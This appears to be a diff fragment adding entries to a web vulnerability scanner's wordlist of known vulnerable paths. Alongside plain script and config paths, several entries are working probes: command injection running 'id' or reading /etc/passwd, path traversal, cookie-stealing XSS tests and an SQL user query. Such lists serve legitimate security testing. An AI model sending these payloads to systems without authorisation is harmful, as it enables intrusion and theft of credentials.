3890
+ webutil.pl
3891
+ webutils.pl
3892
+ webwho.pl
3893
+ welcome.nsf
3894
+ wguest.exe
3895
+ whatever.htr
3896
+ whateverJUNK(4).html
3897
+ where.pl?sd=ls%20/etc
3898
+ whois.cgi?action=load&whois=%3Bid
3899
+ whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
3900
+ whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
3901
+ whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
3902
+ wikihome/action/conflict.php
3903
+ windmail
3904
+ windmail.exe
3905
+ windows/
3906
+ wksinst.nsf
3907
+ word/
3908
+ work/
3909
+ wrap
3910
+ wrap.cgi
3911
+ ws_ftp.ini
3912
+ wstats/
3913
+ wusage/
3914
+ www-sql
3915
+ www-sql/
3916
+ www/
3917
+ wwwadmin.pl
3918
+ wwwboard.cgi.cgi
3919
+ wwwboard.pl
3920
+ wwwboard/passwd.txt
3921
+ wwwboard/wwwboard.cgi
3922
+ wwwboard/wwwboard.pl
3923
+ wwwjoin/
3924
+ wwwlog/
3925
+ wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>
3926
+ wwwstats.html
3927
+ wwwstats.pl
3928
+ wwwstats/
3929
+ wwwthreads/3tvars.pm
3930
+ wwwthreads/w3tvars.pm
3931
+ wwwwais
3932
+ wx/s.dll?d=/boot.ini
3933
+ x_stat_admin.php
3934
+ xdk/
3935
+ xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS
3936
+ yabbse/Reminder.php
3937
+ yabbse/Sources/Packages.php
3938
+ z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&
3939
+ zentrack/index.php
3940
+ zipfiles/
3941
+ zml.cgi?file=../../../../../../../../../../etc
3942
+ zml.cgi?file=../../../../../../../../../../etc/passwd%00
3943
+ zorum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
3944
+ zsh
3945
+ ~/<script>alert('Vulnerable')</script>.asp
3946
+ ~/<script>alert('Vulnerable')</script>.aspx
3947
+ ~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null
3948
+ ~nobody/etc/passwd